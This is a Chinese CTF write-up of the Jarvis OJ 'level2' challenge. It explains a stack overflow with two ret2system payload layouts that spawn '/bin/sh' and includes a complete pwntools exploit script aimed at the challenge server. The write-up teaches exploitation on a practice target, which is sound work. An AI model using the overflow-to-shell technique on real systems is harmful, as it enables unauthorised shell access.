jarvis oj level2–两种方式构造函数栈

关于这个level2,在网上找到了两种解法,放在一起分析了一下。

首先查看题目基本信息:

jarvis oj level2–两种方式构造函数栈_第1张图片

程序开启了栈不可执行保护。

IDA查看反汇编代码:

jarvis oj level2–两种方式构造函数栈_第2张图片

jarvis oj level2–两种方式构造函数栈_第3张图片

可以看到存在栈溢出,并且程序调用了system函数。

所以我们的思路就是构造vulnerable_function()的buf变量,使得:返回地址被覆盖为system函数的地址,构造system函数的栈帧,并为system传递参数’/bin/sh’。

先说第一种payload1的构造:

a*0x88(buf)+a*4(ebp)+system地址+构造的任意的system函数返回地址+’/bin/sh’字符串的地址(system函数的参数)

我们从payload分析原理

填充buf后:

jarvis oj level2–两种方式构造函数栈_第4张图片

当 vulnerable 函数执行到返回地址出栈时,即 pop 出 system_addr 程序跳转到system函数时,栈顶为我们构造的xxxxx(无效的system返回地址),紧接着就是’/bin/sh’的地址。来看此时的栈分布,就相当于调用了system(‘/bin/sh’)。

jarvis oj level2–两种方式构造函数栈_第5张图片

此时的栈帧结构符合正常调用system函数的栈帧结构(只有返回地址,这也就是为什么要构造一个无效的返回地址),所以system可以正常执行。

也就是说我们完成了system函数栈帧的构造

第二种payload构造:

a*0x88(buf)+a*4(ebp)+call_system地址+’/bin/sh’字符串的地址(system函数的参数)

call_system地址是指从main函数(或者其他函数)调用system函数的那条指令的地址。

jarvis oj level2–两种方式构造函数栈_第6张图片

还是从 vulnerable_function执行完说起,最后一条指令ret 执行完后,system地址出栈,程序跳转到call system那一条指令处。此时栈的情况:栈顶为’/bin/sh’的地址。与第一种情况相比少了一个构造的任意返回地址。

当执行call system函数时,又会向栈中压入一个返回地址,就是call system的下一条指令的地址。所以说call 指令完成了payload1中的构造任意返回地址。

附上最终的代码:

from pwn import *
 context(log_level = "debug",arch = "i386",os = "linux")
 ip = 'pwn2.jarvisoj.com'
 port = '9878'
 io = remote(ip,port)
 padding = 0x8C * 'A'

 bin_sh_addr = 0x0804A024
 system_addr=0x08048320
 call_system_addr = 0x0804849E

 payload = padding +  p32(call_system_addr) +  p32(bin_sh_addr)
 payload = padding +  p32(system_addr) + p32(1) + p32(bin_sh_addr)

 io.recvuntil('Input:')
 io.sendline(payload)
 io.interactive()

 

参考链接:

https://www.freebuf.com/column/183879.html

https://blog.csdn.net/qq_35661990/article/details/83902369

https://www.cnblogs.com/WangAoBo/p/7622091.html

文章同步到我的博客:http://www.zjzhhb.com/archives/627

 

你可能感兴趣的:(汇编与逆向,学习笔记)